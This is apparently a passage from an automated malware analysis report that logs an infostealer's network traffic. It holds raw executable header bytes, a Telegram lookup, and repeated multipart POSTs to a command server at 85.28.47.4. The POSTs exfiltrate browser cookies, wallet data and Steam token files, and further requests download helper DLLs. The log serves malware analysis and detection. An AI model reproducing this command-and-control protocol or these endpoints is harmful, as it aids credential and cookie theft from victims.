00 00 00 00 2e 74 65 78 74 00 00 00 06 2e 02 00 00 10 00 00 00 30 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 73 53 00 00 00 00 1d 0e 00 00 00 40 02 00 00 10 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 ae 00 00 00 50 02 00 00 b0 00 00 00 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 0c 05 00 00 00 03 00 00 fe 04 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 1c 1d 00 00 00 10 08 00 00 1e 00 00 00 f2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:56 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 30 Jun 2024 07:52:30 GMTETag: "81000-61c16c33a5f2a"Accept-Ranges: bytesContent-Length: 528384Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 dc 05 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 f5 02 00 50 00 00 00 10 f6 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 08 00 1c 1d 00 00 68 d8 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 2e 02 00 00 10 00 00 00 30 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 73 53 00 00 00 00 1d 0e 00 00 00 40 02 00 00 10 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 ae 00 00 00 50 02 00 00 b0 00 00 00 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 0c 05 00 00 00 03 00 00 fe 04 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 1c 1d 00 00 00 10 08 00 00 1e 00 00 00 f2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /g067n HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 36 35 43 42 34 46 39 34 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="hwid"7365CB4F94144293944220------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build"default------CGIDAAAKJJDBGCBFCBGI--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="message"browsers------KFIJEGCBGIDGHIDHDGCB--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="message"plugins------HCAAEBKEGHJKEBFHJDBF--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJKHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------EBGIDGCAFCBKECAAKJJKContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------EBGIDGCAFCBKECAAKJJKContent-Disposition: form-data; name="message"fplugins------EBGIDGCAFCBKECAAKJJK--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJEHost: 85.28.47.4Content-Length: 6755Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 2d 2d 0d 0a Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file"------GIEHJKEBAAEBGCAAEBFH--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 2d 2d 0d 0a Data Ascii: ------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="file"------HCGDGIDGIJKKEBGDAECA--
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEHCAKFBGDGCAAAFBGHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="message"wallets------KFBAECBAEGDGDHIEHIJJ--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="message"files------JEGHDAFIDGDAAKEBFHDA--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file"------DGHDHIDGHIDGIECBKKJJ--
